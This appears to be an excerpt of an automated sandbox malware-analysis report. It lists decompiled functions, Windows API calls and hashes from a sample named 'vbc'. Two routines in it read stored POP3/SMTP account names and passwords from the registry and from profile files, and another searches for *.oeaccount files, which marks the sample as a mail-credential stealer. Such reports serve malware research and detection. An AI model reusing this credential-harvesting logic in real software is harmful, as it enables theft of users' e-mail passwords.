                                                                                                                                                    • Instruction ID: 9d865b7f43533acfebf3b00b6ce8d331e43bccbbf35dbaed0a6f3a0435680c9f
                                                                                                                                                    • Opcode Fuzzy Hash: 7d2b7ca13242ecb95fba35a4d161325a02a1357963518cd5c2775a7b681f11d7
                                                                                                                                                    • Instruction Fuzzy Hash: B3D0C970E4020D76E600BAA0FD07B897BAC5B00605F508421BA41F51E2FAE8A15586A9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004047A0 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E004047A0(CHAR* __esi, void* __eflags) {
				struct HINSTANCE__* _t8;
				char _t12;
				char* _t15;
				CHAR* _t17;

				_t17 = __esi;
				E004047F1(__esi);
				_t8 = LoadLibraryA(__esi); // executed
				__esi[0x200] = _t8;
				if(_t8 != 0) {
					_t12 = GetProcAddress(_t8,  &(__esi[0xff]));
					__esi[0x208] = _t12;
					if(_t12 != 0) {
						__esi[0x204] = 1;
					}
				}
				_t15 =  &(_t17[0x204]);
				if( *_t15 == 0) {
					E004047F1(_t17);
				}
				return  *_t15;
			}







                                                                                                                                                    0x004047a0
                                                                                                                                                    0x004047a2
                                                                                                                                                    0x004047a8
                                                                                                                                                    0x004047b0
                                                                                                                                                    0x004047b6
                                                                                                                                                    0x004047c0
                                                                                                                                                    0x004047c8
                                                                                                                                                    0x004047ce
                                                                                                                                                    0x004047d0
                                                                                                                                                    0x004047d0
                                                                                                                                                    0x004047ce
                                                                                                                                                    0x004047db
                                                                                                                                                    0x004047e4
                                                                                                                                                    0x004047e8
                                                                                                                                                    0x004047e8
                                                                                                                                                    0x004047f0

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004047F1: FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7554F420), ref: 004047A8
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 145871493-0
                                                                                                                                                    • Opcode ID: cbabdfec5215e458202f737861f40a15f802b817f3ec498c61102a043c0cc1ea
                                                                                                                                                    • Instruction ID: bd92e302f737a6b7e7c2aa8ed3bd721d1bcdfa8038008227cdd2def65d6b9a1b
                                                                                                                                                    • Opcode Fuzzy Hash: cbabdfec5215e458202f737861f40a15f802b817f3ec498c61102a043c0cc1ea
                                                                                                                                                    • Instruction Fuzzy Hash: F1F039B02007028BD7209F39D84879B77E8BF85700F00853EF266E3281EB78A951CB28
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040EB0E Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32 ref: 0040EB35
                                                                                                                                                      • Part of subcall function 0040EA26: memset.MSVCRT ref: 0040EA44
                                                                                                                                                      • Part of subcall function 0040EA26: _itoa.MSVCRT ref: 0040EA5B
                                                                                                                                                      • Part of subcall function 0040EA26: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0040EA6A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4165544737-0
                                                                                                                                                    • Opcode ID: 41fbf1d09f89329d89d85b9c1c83700b09fa1e2b362e37a4bb4b326ca53279f5
                                                                                                                                                    • Instruction ID: f55a197cdd86fa31c53d12907dd8f70643f2484b8232c3448506387801693677
                                                                                                                                                    • Opcode Fuzzy Hash: 41fbf1d09f89329d89d85b9c1c83700b09fa1e2b362e37a4bb4b326ca53279f5
                                                                                                                                                    • Instruction Fuzzy Hash: F2E0B632000109FBCF125F95EC01AAA7F76FF08314F148869FD5855161D332A570EF55
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004047F1 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E004047F1(void* __eax) {
				struct HINSTANCE__* _t5;
				signed int* _t7;

				 *(__eax + 0x204) =  *(__eax + 0x204) & 0x00000000;
				_t7 = __eax + 0x200;
				_t5 =  *_t7;
				if(_t5 != 0) {
					_t5 = FreeLibrary(_t5); // executed
					 *_t7 =  *_t7 & 0x00000000;
				}
				return _t5;
			}





                                                                                                                                                    0x004047f1
                                                                                                                                                    0x004047f9
                                                                                                                                                    0x004047ff
                                                                                                                                                    0x00404803
                                                                                                                                                    0x00404806
                                                                                                                                                    0x0040480c
                                                                                                                                                    0x0040480c
                                                                                                                                                    0x00404810

                                                                                                                                                    APIs
                                                                                                                                                    • FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                    • Opcode ID: 44cb22c5a6e339dc322f31723d6313ec8e4e2f7ef4db3de4f35608b5b7650eec
                                                                                                                                                    • Instruction ID: 9a892a7b4d94419058e15305363ecf1fbcdc16662e35282e5c511663eadef616
                                                                                                                                                    • Opcode Fuzzy Hash: 44cb22c5a6e339dc322f31723d6313ec8e4e2f7ef4db3de4f35608b5b7650eec
                                                                                                                                                    • Instruction Fuzzy Hash: 90D012721003118FD7705F14EC0CBE133E8AF40312F2584B8EA55E7155C3749584CA58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00405EE4 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00405EE4(CHAR* _a4) {
				void* _t3;

				_t3 = CreateFileA(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
				return _t3;
			}




                                                                                                                                                    0x00405ef6
                                                                                                                                                    0x00405efc

                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,00409B54,00000000,00000000,00000000,00412466,00412466,?,0040B99D,00412466), ref: 00405EF6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                    • Opcode ID: 5f03ab8047931506169ca7aa38a5df993ced9b6cd9a6d4ef42b8e6b291ce57f8
                                                                                                                                                    • Instruction ID: 5973f86ffe51395cbbea2b6db375788de2bc2c82441068c359f9d196895a4387
                                                                                                                                                    • Opcode Fuzzy Hash: 5f03ab8047931506169ca7aa38a5df993ced9b6cd9a6d4ef42b8e6b291ce57f8
                                                                                                                                                    • Instruction Fuzzy Hash: F7C092B0290201BEFF208A10AD0AF77295DE780700F10C4207A00E40E0D2A14C109A24
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040E894 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040E894(void* __esi) {
				struct HINSTANCE__* _t6;
				int _t7;

				_t6 =  *(__esi + 8);
				 *(__esi + 0xc) =  *(__esi + 0xc) & 0x00000000;
				if(_t6 != 0) {
					_t7 = FreeLibrary(_t6); // executed
					 *(__esi + 8) =  *(__esi + 8) & 0x00000000;
					return _t7;
				}
				return _t6;
			}





                                                                                                                                                    0x0040e894
                                                                                                                                                    0x0040e897
                                                                                                                                                    0x0040e89d
                                                                                                                                                    0x0040e8a0
                                                                                                                                                    0x0040e8a6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040e8a6
                                                                                                                                                    0x0040e8aa

                                                                                                                                                    APIs
                                                                                                                                                    • FreeLibrary.KERNELBASE(?,0040E8C8,?,?,?,?,?,?,0040421D), ref: 0040E8A0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                    • Opcode ID: 4be415d56670eca266e1e771d593f986771612930e6043792484bc2d1f3df44a
                                                                                                                                                    • Instruction ID: 5028da6d49437ecb3f89885db84a6a431b650c8c1a4919c17fb61c23058b4b99
                                                                                                                                                    • Opcode Fuzzy Hash: 4be415d56670eca266e1e771d593f986771612930e6043792484bc2d1f3df44a
                                                                                                                                                    • Instruction Fuzzy Hash: 80C04C31110B018FE7219B12C949753B7E4BF00317F44C868955BD58A4D77CE4A4CE18
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040ED91 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040ED91(struct HINSTANCE__* _a4, CHAR* _a8) {

				EnumResourceNamesA(_a4, _a8, E0040ED0B, 0); // executed
				return 1;
			}



                                                                                                                                                    0x0040eda0
                                                                                                                                                    0x0040eda9

                                                                                                                                                    APIs
                                                                                                                                                    • EnumResourceNamesA.KERNEL32 ref: 0040EDA0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnumNamesResource
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3334572018-0
                                                                                                                                                    • Opcode ID: 8d1524d9c285d25282b74650c2e98e28a06c4412789f7c986a027f2826179987
                                                                                                                                                    • Instruction ID: b68387c5c0e4344f5c23b4f6c0320e636f75da40900f583e81955e3ef688938f
                                                                                                                                                    • Opcode Fuzzy Hash: 8d1524d9c285d25282b74650c2e98e28a06c4412789f7c986a027f2826179987
                                                                                                                                                    • Instruction Fuzzy Hash: 11C09B31594342D7C7119F109D09F1B7A95FF58701F158C3D7251D40E0C7614034D605
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00406F5B Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00406F5B(signed int* __esi) {
				int _t2;
				void* _t3;

				_t3 =  *__esi;
				if(_t3 != 0xffffffff) {
					_t2 = FindClose(_t3); // executed
					 *__esi =  *__esi | 0xffffffff;
					return _t2;
				}
				return 0;
			}





                                                                                                                                                    0x00406f5b
                                                                                                                                                    0x00406f62
                                                                                                                                                    0x00406f65
                                                                                                                                                    0x00406f6b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406f6b
                                                                                                                                                    0x00406f6e

                                                                                                                                                    APIs
                                                                                                                                                    • FindClose.KERNELBASE(?,00406E75,?,?,00000000,rA,00410C7E,*.oeaccount,rA,?,00000104), ref: 00406F65
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseFind
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1863332320-0
                                                                                                                                                    • Opcode ID: 29a0a411e84d7c5badd8bde6db7469c3766740cb6e366e0fff699bb7c3a5e544
                                                                                                                                                    • Instruction ID: b31b0b49456476ea20311e3f3804ac2d10f8d6de1d59c17087b16cfdac6e9e38
                                                                                                                                                    • Opcode Fuzzy Hash: 29a0a411e84d7c5badd8bde6db7469c3766740cb6e366e0fff699bb7c3a5e544
                                                                                                                                                    • Instruction Fuzzy Hash: 67C048351145029AD22C9B38AA5942A77A2AA493303B50B6CB1F3D20E0E77884628A04
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040614B Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040614B(CHAR* _a4) {
				long _t4;

				_t4 = GetFileAttributesA(_a4); // executed
				return 0 | _t4 != 0xffffffff;
			}




                                                                                                                                                    0x0040614f
                                                                                                                                                    0x0040615f

                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: e54bea251bae5a778522ddcd773e5ba5f40eb5ac82a352d16be9d7832b5142d7
                                                                                                                                                    • Instruction ID: f3b66c96cd424dd7ad3beae2567feb80d20b4231abd0f1b127a655f441aacc1c
                                                                                                                                                    • Opcode Fuzzy Hash: e54bea251bae5a778522ddcd773e5ba5f40eb5ac82a352d16be9d7832b5142d7
                                                                                                                                                    • Instruction Fuzzy Hash: CAB012752100005BCB0807349D4608E75505F45631720873CB033D00F0D730CC71BB01
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040EB3F Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040EB3F(void* _a4, char* _a8, void** _a12) {
				long _t4;

				_t4 = RegOpenKeyExA(_a4, _a8, 0, 0x20019, _a12); // executed
				return _t4;
			}




                                                                                                                                                    0x0040eb52
                                                                                                                                                    0x0040eb58

                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Open
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                    • Opcode ID: b46f2f1118fe08c26f7697601471cbdaa0b1b95653fa9af9082cd2e3fcf7fc30
                                                                                                                                                    • Instruction ID: fbac0a3e3d82dbf35b582ab386aad6bc4faf60f338d600bbfef3ad5534bed626
                                                                                                                                                    • Opcode Fuzzy Hash: b46f2f1118fe08c26f7697601471cbdaa0b1b95653fa9af9082cd2e3fcf7fc30
                                                                                                                                                    • Instruction Fuzzy Hash: 60C09B35544301BFDE118F40EE05F09BF62BB88B01F104814B394740B1C3718424FB17
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 00402D9A Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 153stringregistryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                    			E00402D9A(void* __ecx, void* __edi, void* __esi, void* __fp0, signed int _a4, void* _a8) {
				signed int _v8;
				char _v20;
				char _v24;
				char _v152;
				char _v280;
				char _v408;
				intOrPtr _v412;
				char _v668;
				char _v796;
				intOrPtr _v800;
				char _v928;
				char _v940;
				char _v952;
				char _v956;
				char _v1084;
				char _v1212;
				char _v1340;
				intOrPtr _v1344;
				char _v1600;
				char _v1728;
				intOrPtr _v1732;
				char _v1860;
				char _v1872;
				void* _t59;
				signed int _t60;
				intOrPtr _t63;
				void* _t113;
				void* _t118;
				void* _t122;
				char* _t123;
				void* _t141;

				_t141 = __fp0;
				_t118 = __edi;
				_t113 = __ecx;
				_t59 = E0040EB3F(_a4, _a8,  &_a8);
				if(_t59 == 0) {
					_t60 = 0x7d;
					_a4 = _t60;
					_v8 = _t60;
					E004021D8( &_v1872);
					E004021D8( &_v940);
					_t63 = 2;
					_v1732 = _t63;
					_v800 = _t63;
					_push( &_v928);
					_push("DisplayName");
					_push(_a8);
					_v1344 = 4;
					_t122 = 0x7f;
					_v412 = 1;
					E0040EB80(_t122, _t113);
					E0040EB80(_t122, _t113, _a8, "EmailAddress",  &_v796);
					E0040EB80(_t122, _t113, _a8, "PopAccount",  &_v408);
					E0040EB80(_t122, _t113, _a8, "PopServer",  &_v668);
					E0040EB59(_t113, _a8, "PopPort",  &_v24);
					E0040EB59(_t113, _a8, "PopLogSecure",  &_v20);
					if(E0040EBA3(_t113, _a8, "PopPassword",  &_v280,  &_a4) != 0) {
						_a4 = _a4 & 0x00000000;
					}
					strcpy( &_v1860,  &_v928);
					strcpy( &_v1728,  &_v796);
					E0040EB80(_t122, _t113, _a8, "SMTPAccount",  &_v1340);
					E0040EB80(_t122, _t113, _a8, "SMTPServer",  &_v1600);
					E0040EB59(_t113, _a8, "SMTPPort",  &_v956);
					E0040EB59(_t113, _a8, "SMTPLogSecure",  &_v952);
					if(E0040EBA3(_t113, _a8, "SMTPPassword",  &_v1212,  &_v8) != 0) {
						_v8 = _v8 & 0x00000000;
					}
					_t123 = _t118 + 0xa9c;
					strcpy( &_v152, _t123);
					strcpy( &_v1084, _t123);
					_t116 = _a4;
					if(_a4 > 0) {
						E00401D18( &_v280, _t116);
					}
					if(_v408 != 0) {
						E00402407( &_v940, _t141, _t118);
					}
					_t117 = _v8;
					if(_v8 > 0) {
						E00401D18( &_v1212, _t117);
					}
					if(_v1340 != 0) {
						E00402407( &_v1872, _t141, _t118);
					}
					return RegCloseKey(_a8);
				}
				return _t59;
			}


































                                                                                                                                                    0x00402d9a
                                                                                                                                                    0x00402d9a
                                                                                                                                                    0x00402d9a
                                                                                                                                                    0x00402dad
                                                                                                                                                    0x00402db7
                                                                                                                                                    0x00402dc0
                                                                                                                                                    0x00402dc7
                                                                                                                                                    0x00402dca
                                                                                                                                                    0x00402dcd
                                                                                                                                                    0x00402dd8
                                                                                                                                                    0x00402ddf
                                                                                                                                                    0x00402de0
                                                                                                                                                    0x00402de6
                                                                                                                                                    0x00402df2
                                                                                                                                                    0x00402df3
                                                                                                                                                    0x00402df8
                                                                                                                                                    0x00402dfb
                                                                                                                                                    0x00402e07
                                                                                                                                                    0x00402e0a
                                                                                                                                                    0x00402e14
                                                                                                                                                    0x00402e2a
                                                                                                                                                    0x00402e40
                                                                                                                                                    0x00402e56
                                                                                                                                                    0x00402e67
                                                                                                                                                    0x00402e78
                                                                                                                                                    0x00402e9d
                                                                                                                                                    0x00402e9f
                                                                                                                                                    0x00402e9f
                                                                                                                                                    0x00402eb1
                                                                                                                                                    0x00402ec4
                                                                                                                                                    0x00402eda
                                                                                                                                                    0x00402ef0
                                                                                                                                                    0x00402f04
                                                                                                                                                    0x00402f18
                                                                                                                                                    0x00402f3d
                                                                                                                                                    0x00402f3f
                                                                                                                                                    0x00402f3f
                                                                                                                                                    0x00402f43
                                                                                                                                                    0x00402f51
                                                                                                                                                    0x00402f5e
                                                                                                                                                    0x00402f63
                                                                                                                                                    0x00402f6c
                                                                                                                                                    0x00402f74
                                                                                                                                                    0x00402f74
                                                                                                                                                    0x00402f80
                                                                                                                                                    0x00402f89
                                                                                                                                                    0x00402f89
                                                                                                                                                    0x00402f8e
                                                                                                                                                    0x00402f93
                                                                                                                                                    0x00402f9b
                                                                                                                                                    0x00402f9b
                                                                                                                                                    0x00402fa7
                                                                                                                                                    0x00402fb0
                                                                                                                                                    0x00402fb0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00402fb8
                                                                                                                                                    0x00402fbf

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                                                                                      • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                                                                                                      • Part of subcall function 0040EB59: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402945,?,?,?,?,00402945,?,?), ref: 0040EB78
                                                                                                                                                      • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                                                                                                                    • strcpy.MSVCRT(?,?), ref: 00402EB1
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,?), ref: 00402EC4
                                                                                                                                                    • strcpy.MSVCRT(?,?), ref: 00402F51
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,?), ref: 00402F5E
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402FB8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: strcpy$QueryValue$CloseOpen
                                                                                                                                                    • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                                                                                    • API String ID: 4127491968-1534328989
                                                                                                                                                    • Opcode ID: 230cedb7557afc89ff87b7a07133d539cd397bf30d1a568f7adca2b7a7a96a6c
                                                                                                                                                    • Instruction ID: 43883d4594eb94b0077ee0611f04b7cce421852a2964d1822423da303833eb9e
                                                                                                                                                    • Opcode Fuzzy Hash: 230cedb7557afc89ff87b7a07133d539cd397bf30d1a568f7adca2b7a7a96a6c
                                                                                                                                                    • Instruction Fuzzy Hash: 5D514AB1A0021CBADB11EB56CD41FDE777CAF04354F1084A7BA08B2191D7B8ABA5CF58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004033D7 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E004033D7(void* __edi, void* __fp0, intOrPtr _a4) {
				char _v276;
				char _v404;
				intOrPtr _v408;
				char _v664;
				intOrPtr _v796;
				char _v936;
				char _v1208;
				char _v1336;
				intOrPtr _v1340;
				char _v1596;
				intOrPtr _v1728;
				char _v1868;
				void* __esi;
				intOrPtr _t23;
				void* _t35;

				_t48 = __fp0;
				E004021D8( &_v936);
				E004021D8( &_v1868);
				_t23 = 4;
				_v796 = _t23;
				_v1728 = _t23;
				_v408 = _t23;
				_v1340 = 1;
				E00403397(__edi, "SMTPServer",  &_v664);
				E00403397(__edi, "ESMTPUsername",  &_v404);
				E00403397(__edi, "ESMTPPassword",  &_v276);
				E00403397(__edi, "POP3Server",  &_v1596);
				E00403397(__edi, "POP3Username",  &_v1336);
				_t35 = E00403397(__edi, "POP3Password",  &_v1208);
				if(_v276 != 0) {
					E004033B8( &_v276);
					_t35 = E00402407( &_v936, __fp0, _a4);
				}
				if(_v1208 != 0) {
					E004033B8( &_v1208);
					return E00402407( &_v1868, _t48, _a4);
				}
				return _t35;
			}


















                                                                                                                                                    0x004033d7
                                                                                                                                                    0x004033e7
                                                                                                                                                    0x004033f2
                                                                                                                                                    0x004033f9
                                                                                                                                                    0x004033fa
                                                                                                                                                    0x00403400
                                                                                                                                                    0x00403406
                                                                                                                                                    0x00403419
                                                                                                                                                    0x00403423
                                                                                                                                                    0x00403435
                                                                                                                                                    0x00403447
                                                                                                                                                    0x00403459
                                                                                                                                                    0x0040346b
                                                                                                                                                    0x0040347d
                                                                                                                                                    0x00403489
                                                                                                                                                    0x00403491
                                                                                                                                                    0x0040349f
                                                                                                                                                    0x0040349f
                                                                                                                                                    0x004034ab
                                                                                                                                                    0x004034b3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004034c1
                                                                                                                                                    0x004034c8

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                    • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                    • API String ID: 3963849919-1658304561
                                                                                                                                                    • Opcode ID: a1e27bd18c60c19633001e89eabf5a28a20170ba59de575fff79d49308c97fe4
                                                                                                                                                    • Instruction ID: 83b6c818750e3233ea62b9214f8e154f1c79117fabd3a6fe6fd9d90b5f1d4615
                                                                                                                                                    • Opcode Fuzzy Hash: a1e27bd18c60c19633001e89eabf5a28a20170ba59de575fff79d49308c97fe4
                                                                                                                                                    • Instruction Fuzzy Hash: DA21E271844218A9DB61EB11CD86BED7B7C9F44709F0000EBAA08B60D2DBBC5BD58F59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

